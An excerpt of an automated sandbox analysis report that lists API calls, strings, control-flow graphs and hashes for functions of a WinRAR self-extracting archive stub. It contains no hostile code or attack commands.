                                        • Opcode Fuzzy Hash: a57e6b2f4e7bf4807325cd940e44dd60c6cfb9df065d5fe9d8cecfad8bc15a7f
                                        • Instruction Fuzzy Hash: BA514371915619DFCF54DF64D988AEDB7B8BF09320F1042AAE519E3290DB30AAA4CF50
                                        Function 0027BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 0027C342
                                          • Part of subcall function 00282095: __EH_prolog3_GS.LIBCMT ref: 0028209C
                                          • Part of subcall function 002757C0: __EH_prolog3.LIBCMT ref: 002757C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3H_prolog3__wcslen
                                        • String ID: __tmp_reference_source_
                                        • API String ID: 1523997010-685763994
                                        • Opcode ID: 2ddffb9fe3dedf9682bc1363f1151534b08e4a639afbd0d301fedbf4b017f296
                                        • Instruction ID: fa0fa8280502290c15950c93c58495e6105decf8e15c8509bbd6e34cd2a390d5
                                        • Opcode Fuzzy Hash: 2ddffb9fe3dedf9682bc1363f1151534b08e4a639afbd0d301fedbf4b017f296
                                        • Instruction Fuzzy Hash: 36D2E57092428A9FDF29DF74C890BEEBBB4BF05304F14855EE49E97241DB30A969CB50
                                        Function 0029ECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002,00000000), ref: 0029ECCB
                                        • TerminateProcess.KERNEL32(00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002,00000000), ref: 0029ECD2
                                        • ExitProcess.KERNEL32 ref: 0029ECE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 935525420e971c33510c60226e70061257f107c7d5641739675a636e91a2947b
                                        • Instruction ID: 4fb8fe43f544fb32ed441bf2ce004c2fc79a68c7d07452d3eeb74f4ccf034ed8
                                        • Opcode Fuzzy Hash: 935525420e971c33510c60226e70061257f107c7d5641739675a636e91a2947b
                                        • Instruction Fuzzy Hash: 85E0B632150608AFCF11AF54EE0DA587B69EF52391F150424F945AA222CF36EDA2DB50
                                        Function 0028B76F Relevance: .4, Instructions: 353COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 356b5361dd64e6f715d81803efe2377399896979182c56f88cd7690f92bb34f9
                                        • Instruction ID: e45b8c86407771d38c0f3139da580d45f546e25d77ab19fc6702fff1f3eb19bc
                                        • Opcode Fuzzy Hash: 356b5361dd64e6f715d81803efe2377399896979182c56f88cd7690f92bb34f9
                                        • Instruction Fuzzy Hash: 94E1D3755193458FDB25EF28C884B5BBBE4BF88308F08456DEC889B382D774E964CB52
                                        Function 00290900 Relevance: 93.7, APIs: 43, Strings: 10, Instructions: 935windowfilesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0029090A
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000000), ref: 00290A18
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00290A57
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00290A71
                                        • IsDialogMessageW.USER32(?,?), ref: 00290A84
                                        • TranslateMessage.USER32(?), ref: 00290A92
                                        • DispatchMessageW.USER32(?), ref: 00290A9C
                                        • EndDialog.USER32(?,00000001), ref: 00290ADE
                                        • GetDlgItem.USER32(?,00000068), ref: 00290B04
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00290B1F
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC6C8), ref: 00290B32
                                        • SetFocus.USER32(00000000), ref: 00290B39
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00290C20
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00290C4C
                                        • GetTickCount.KERNEL32 ref: 00290C79
                                        • GetLastError.KERNEL32(?,00000011), ref: 00290CD5
                                        • GetCommandLineW.KERNEL32 ref: 00290DF9
                                        • _wcslen.LIBCMT ref: 00290E06
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,002C5430,00000400,00000001,00000001), ref: 00290E85
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00290EA3
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00290EDC
                                        • WaitForInputIdle.USER32(?,00002710), ref: 00290F0B
                                        • Sleep.KERNEL32(00000064), ref: 00290F25
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,002C5430,00000400), ref: 00290F61
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,002C5430,00000400), ref: 00290F6D
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00291072
                                          • Part of subcall function 00271E1F: GetDlgItem.USER32(?,?), ref: 00271E34
                                          • Part of subcall function 00271E1F: ShowWindow.USER32(00000000), ref: 00271E3B
                                        • SetDlgItemTextW.USER32(?,00000065,002AC6C8), ref: 0029108A
                                        • GetDlgItem.USER32(?,00000065), ref: 00291093
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002910A2
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00291422
                                        • EndDialog.USER32(?,00000001), ref: 00291436
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002910B1
                                          • Part of subcall function 0028E265: __EH_prolog3_GS.LIBCMT ref: 0028E26C
                                          • Part of subcall function 0028E265: ShowWindow.USER32(?,00000000,00000038), ref: 0028E294
                                          • Part of subcall function 0028E265: GetWindowRect.USER32(?,?), ref: 0028E2D8
                                          • Part of subcall function 0028E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 0028E373
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0029114F
                                        • SendMessageW.USER32(?,00000080,00000001,0001041B), ref: 00291284
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050D57), ref: 0029129D
                                        • GetDlgItem.USER32(?,00000068), ref: 002912A6
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002912BE
                                        • GetDlgItem.USER32(?,00000066), ref: 002912E6
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0029135D
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00291371
                                        • EnableWindow.USER32(?,00000000), ref: 002915A7
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002915E8
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0029160D
                                          • Part of subcall function 00291D4F: __EH_prolog3_GS.LIBCMT ref: 00291D59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                        • String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S,$LICENSEDLG$STARTDLG$\S,$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp$J)
                                        • API String ID: 3616063595-1258988733
                                        • Opcode ID: c995d54ba933fa9ef122a58af09b2294594f91cbc89cf36f5b897eb0234b9db6
                                        • Instruction ID: 57dba16cdbed5563d5818df07cb1e690591c390a5e2b5a3a62acd2dc2333fdea
                                        • Opcode Fuzzy Hash: c995d54ba933fa9ef122a58af09b2294594f91cbc89cf36f5b897eb0234b9db6
                                        • Instruction Fuzzy Hash: 0B72C570824359AEEF21EB64DC89FED7BB8AF05700F004199F509B7192DBB45AA4CF21
                                        Function 00286D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 470 286d7b-286dd1 call 295b20 GetModuleHandleW 473 286e28-28708c 470->473 474 286dd3-286de3 GetProcAddress 470->474 475 28719b 473->475 476 287092-28709d call 29e50e 473->476 477 286dfd-286e0d GetProcAddress 474->477 478 286de5-286dfb 474->478 481 28719d-2871be call 2813f9 call 282117 475->481 476->475 486 2870a3-2870b8 call 2813f9 476->486 477->473 480 286e0f-286e24 477->480 478->477 480->473 493 2871c0-2871cc call 28067e 481->493 494 2870ba 486->494 495 2870bd-2870d5 CreateFileW 486->495 502 2871ce-2871dc call 286c5e 493->502 503 287203-287234 call 2714a7 call 28229d call 271a66 call 27ed1f 493->503 494->495 497 2870db-2870e7 SetFilePointer 495->497 498 287186-287199 CloseHandle call 271a66 495->498 497->498 500 2870ed-287107 ReadFile 497->500 498->481 500->498 504 287109-287114 500->504 502->503 515 2871de-287201 CompareStringW 502->515 534 287239-28723c 503->534 508 28711a-28714d call 2714a7 504->508 509 2873f2-2873f7 call 295ce1 504->509 518 287161-287174 call 286366 508->518 515->503 519 28723e-287242 515->519 528 28714f-287156 518->528 529 287176-287181 call 271a66 * 2 518->529 519->493 523 287248 519->523 526 28724c-287250 523->526 530 287252 526->530 531 287296-287298 526->531 532 287158 528->532 533 28715b-28715c call 286c5e 528->533 529->498 538 287254-28728a call 2714a7 call 28229d call 271a66 call 27ed1f 530->538 535 2873bd-2873ef call 271a66 * 2 call 295734 531->535 536 28729e-2872b1 call 282187 call 28067e 531->536 532->533 533->518 534->519 540 28724a 534->540 555 287332-287366 call 286a25 AllocConsole 536->555 556 2872b3-287330 call 286c5e * 2 call 284318 call 286a25 call 284318 call 2714a7 call 28ecf5 call 271549 536->556 571 28728c-287290 538->571 572 287294 538->572 540->526 568 287368-2873a7 GetCurrentProcessId AttachConsole call 287441 call 287436 GetStdHandle WriteConsoleW Sleep FreeConsole 555->568 569 2873ad 555->569 573 2873b0-2873b7 call 271549 ExitProcess 556->573 568->569 569->573 571->538 577 287292 571->577 572->531 577->531
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32,D946AC94), ref: 00286DC7
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00286DD9
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00286E03
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002870CA
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002870DF
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 002870FF
                                        • CloseHandle.KERNEL32(00000000), ref: 00287187
                                        • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 002871F8
                                        • AllocConsole.KERNEL32 ref: 0028735E
                                        • GetCurrentProcessId.KERNEL32 ref: 00287368
                                        • AttachConsole.KERNEL32(00000000), ref: 0028736F
                                        • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0028738F
                                        • WriteConsoleW.KERNEL32(00000000), ref: 00287396
                                        • Sleep.KERNEL32(00002710), ref: 002873A1
                                        • FreeConsole.KERNEL32 ref: 002873A7
                                        • ExitProcess.KERNEL32 ref: 002873B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                        • API String ID: 2644799563-3298887752
                                        • Opcode ID: 5f94ec6d022925d09440f443d2432db7e88ded7e8d7f6387100c9d09c11349bf
                                        • Instruction ID: 1d71b67b76000acb93ca38eb698cd744c8874610dd7055b0933940ea77b6faf5
                                        • Opcode Fuzzy Hash: 5f94ec6d022925d09440f443d2432db7e88ded7e8d7f6387100c9d09c11349bf
                                        • Instruction Fuzzy Hash: 73F180B1425288DBCF20EFA4DC49BDE3BA9BF06304F604119F90A9B691DF709669CF51
                                        Function 00293572 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00290678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                          • Part of subcall function 00290678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                          • Part of subcall function 00290678: IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                          • Part of subcall function 00290678: TranslateMessage.USER32(?), ref: 002906BC
                                          • Part of subcall function 00290678: DispatchMessageW.USER32(?), ref: 002906C6
                                        • GetDlgItem.USER32(00000068,00000000), ref: 00293595
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,0028FD20,00000001,?,?), ref: 002935BA
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002935C9
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC6C8), ref: 002935D7
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002935F1
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0029360B
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0029364F
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00293662
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00293675
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0029369C
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC860), ref: 002936AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: a818c80a9ca79e7b8619caf2b847e301b0adb9117a05e6a671e45ad896c77fd9
                                        • Instruction ID: 8de7e5f3109386ec3b38c8056a4af97aa8e7aaa9f1c02bb62e34f29f75e0a0d0
                                        • Opcode Fuzzy Hash: a818c80a9ca79e7b8619caf2b847e301b0adb9117a05e6a671e45ad896c77fd9
                                        • Instruction Fuzzy Hash: 4131D071249700BFE310DF21EC49F6B7BECEF46700F040518F96596190DBA4A9448FAA
                                        Function 002938A0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 291windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 608 2938a0-2938bc call 2957d8 611 2938c2-2938c8 608->611 612 293bc7-293bd4 call 271a66 call 295787 608->612 611->612 613 2938ce-2938f4 call 2971f0 611->613 620 2938fd-293909 613->620 621 2938f6 613->621 622 29390b 620->622 623 29390d-293916 620->623 621->620 622->623 624 293918-29391b 623->624 625 293924-293927 623->625 626 29391d 624->626 627 29391f-293922 624->627 628 293929 625->628 629 29392b-293935 625->629 626->627 627->629 628->629 630 29393b-293948 629->630 631 2939ce 629->631 632 29394a 630->632 633 29394c-293956 630->633 634 2939d1-2939d3 631->634 632->633 635 293958 633->635 636 29398c-293999 633->636 637 2939dc-2939de 634->637 638 2939d5-2939da 634->638 643 29396f-293972 635->643 641 29399b 636->641 642 29399d-2939a7 636->642 639 2939ff-293a11 call 281383 637->639 640 2939e0-2939e7 637->640 638->637 638->639 661 293a29-293a64 call 2714a7 call 27ed0d call 271a66 639->661 662 293a13-293a20 call 288da4 639->662 640->639 646 2939e9-2939f5 640->646 641->642 648 2939ad-2939b2 642->648 649 293bd7-293bdd 642->649 644 29395a-29395f 643->644 645 293974 643->645 657 293961 644->657 658 293963-29396d 644->658 645->636 650 2939fc 646->650 651 2939f7 646->651 655 2939b4 648->655 656 2939b6-2939bc 648->656 652 293bdf 649->652 653 293be1-293be8 649->653 650->639 651->650 652->653 659 293bea-293bf0 653->659 660 293c00-293c06 653->660 655->656 656->649 663 2939c2-2939c5 656->663 657->658 658->643 664 293976-29397b 658->664 667 293bf2 659->667 668 293bf4-293bfd 659->668 670 293c08 660->670 671 293c0a-293c14 660->671 681 293a9d-293aac ShellExecuteExW 661->681 682 293a66-293a95 call 2714a7 call 280e49 call 271a66 661->682 662->661 676 293a22 662->676 663->630 672 2939cb 663->672 665 29397d 664->665 666 29397f-293989 664->666 665->666 666->636 667->668 668->660 670->671 671->634 672->631 676->661 684 293b7c-293b82 681->684 685 293ab2-293abc 681->685 717 293a9a 682->717 718 293a97 682->718 687 293b84-293b99 684->687 688 293bb7-293bc3 684->688 689 293aca-293acc 685->689 690 293abe-293ac0 685->690 694 293b9b-293bab call 2719a9 687->694 695 293bae-293bb6 call 295726 687->695 688->612 691 293ace-293ad7 IsWindowVisible 689->691 692 293ae5-293af6 WaitForInputIdle call 293fcf 689->692 690->689 696 293ac2-293ac8 690->696 691->692 697 293ad9-293ae3 ShowWindow 691->697 703 293afb-293b02 692->703 694->695 695->688 696->689 702 293b30-293b3b CloseHandle 696->702 697->692 706 293b3d-293b4a call 288da4 702->706 707 293b4c-293b53 702->707 703->702 709 293b04-293b06 703->709 706->707 712 293b6b-293b6d 706->712 707->712 713 293b55-293b57 707->713 709->702 716 293b08-293b17 GetExitCodeProcess 709->716 712->684 715 293b6f-293b71 712->715 713->712 714 293b59-293b5f 713->714 714->712 720 293b61 714->720 715->684 721 293b73-293b76 ShowWindow 715->721 716->702 722 293b19-293b22 716->722 717->681 718->717 720->712 721->684 723 293b29 722->723 724 293b24 722->724 723->702 724->723
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 002938A7
                                        • ShellExecuteExW.SHELL32(?), ref: 00293AA4
                                        • IsWindowVisible.USER32(?), ref: 00293ACF
                                        • ShowWindow.USER32(?,00000000), ref: 00293ADD
                                        • WaitForInputIdle.USER32(?,000007D0), ref: 00293AED
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00293B0F
                                        • CloseHandle.KERNEL32(?), ref: 00293B33
                                        • ShowWindow.USER32(?,00000001), ref: 00293B76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                        • String ID: .exe$.inf$\*
                                        • API String ID: 3208621885-4212905900
                                        • Opcode ID: e2eac52a878a106bc1aa4eb1518d34011f430ac7132df70a396747ba363dbc4b
                                        • Instruction ID: 53e494eeff1f5530d34266842b38b3ec848fcf4ed5f04d5f3717575054495bd5
                                        • Opcode Fuzzy Hash: e2eac52a878a106bc1aa4eb1518d34011f430ac7132df70a396747ba363dbc4b
                                        • Instruction Fuzzy Hash: ACB1DD31A20259DFDF21DF64D898BEDB7B5FF44310F248119E844A7290DBB0AEA6CB50
                                        Function 00289556 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 258COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1052 289556-289572 call 28a570 1055 2895e4-2895f1 1052->1055 1056 289574-289577 1052->1056 1057 289579-289593 1056->1057 1058 2895f4-2895f6 1056->1058 1060 28959b-28959d 1057->1060 1061 289595-289597 1057->1061 1058->1055 1059 2895f8-28960a call 28906e 1058->1059 1068 28961e-289637 call 29734a 1059->1068 1063 28960c-28961a call 28906e 1060->1063 1064 28959f-2895ac call 29d08c 1060->1064 1061->1060 1063->1068 1072 2895bd-2895e2 call 2971f0 1064->1072 1073 2895ae-2895b9 1064->1073 1079 289648-28964d 1068->1079 1080 289639-28963e 1068->1080 1072->1055 1072->1056 1073->1063 1075 2895bb 1073->1075 1075->1064 1083 28965d-28965f 1079->1083 1084 28964f 1079->1084 1081 289640-289642 1080->1081 1082 289644-289646 1080->1082 1081->1079 1081->1082 1089 289671-28967e 1082->1089 1087 28975f-289771 call 28906e 1083->1087 1088 289665-28966b 1083->1088 1085 289773-289781 call 28906e 1084->1085 1086 289655-289657 1084->1086 1097 289785-289786 call 29734a 1085->1097 1086->1083 1086->1085 1087->1097 1088->1087 1088->1089 1092 289680-289683 1089->1092 1093 289685-289690 1089->1093 1092->1093 1096 289696-28969c 1092->1096 1093->1096 1098 2896a2 1096->1098 1099 289755-28975c 1096->1099 1103 28978b-289799 call 28906e 1097->1103 1101 2896b0-2896b2 1098->1101 1102 2896a4-2896aa 1098->1102 1104 2896dc-2896eb call 29d087 1101->1104 1105 2896b4-2896b7 1101->1105 1102->1099 1102->1101 1114 28979d-2897b7 call 29734a call 2957a5 1103->1114 1112 2896ed-2896f0 1104->1112 1113 2896f2-2896f3 call 29d08c 1104->1113 1105->1103 1108 2896bd-2896c4 1105->1108 1108->1104 1111 2896c6-2896c8 1108->1111 1111->1104 1115 2896ca 1111->1115 1116 2896ff-289701 1112->1116 1122 2896f8-2896fd 1113->1122 1138 2897b9-2897bf call 295ddf 1114->1138 1139 2897d2-2897d5 1114->1139 1115->1103 1119 2896d0-2896d6 1115->1119 1120 289721 1116->1120 1121 289703-289709 1116->1121 1119->1103 1119->1104 1127 289739 1120->1127 1128 289723 1120->1128 1124 28970b-28971d call 28906e 1121->1124 1125 28971f 1121->1125 1122->1116 1126 289740-289747 1122->1126 1124->1114 1125->1120 1126->1099 1130 289749-28974f 1126->1130 1127->1126 1132 28972d-289734 call 289556 1128->1132 1133 289725-28972b 1128->1133 1130->1099 1132->1127 1133->1127 1133->1132 1143 2897c4-2897cf call 2971f0 1138->1143 1141 2897db-289802 call 295ddf 1139->1141 1142 289896-28989b call 295773 1139->1142 1147 289807-289810 1141->1147 1143->1139 1150 28982d-289848 call 2971f0 1147->1150 1151 289812-289828 call 295b4b 1147->1151 1150->1142 1155 28984a-28984c 1150->1155 1151->1150 1156 28984f-28985b 1155->1156 1157 289889-289894 1156->1157 1158 28985d-28986c call 29d08c 1156->1158 1157->1142 1157->1156 1160 289871-28987a 1158->1160 1161 28987c-289881 call 279384 1160->1161 1162 289886 1160->1162 1161->1162 1162->1157
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Lc+$Lc+$Lc+$Lc+
                                        • API String ID: 431132790-1939725009
                                        • Opcode ID: e3578e82fdeb3ee18e23a2277c695d1ce936d8404198628debcaeb8fb13f51ac
                                        • Instruction ID: 41ca5c6155453f5871e550e18a233b22b51b3ce1eb4b1413aa471ac781d99463
                                        • Opcode Fuzzy Hash: e3578e82fdeb3ee18e23a2277c695d1ce936d8404198628debcaeb8fb13f51ac
                                        • Instruction Fuzzy Hash: 918158B99363168FDB24FF64C885B7AB7E8AF41300F0C092EE455971C1E7B499A48B91
                                        Function 0028F4D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00286C5E: __EH_prolog3_GS.LIBCMT ref: 00286C65
                                          • Part of subcall function 00286C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • OleInitialize.OLE32(00000000), ref: 0028F4ED
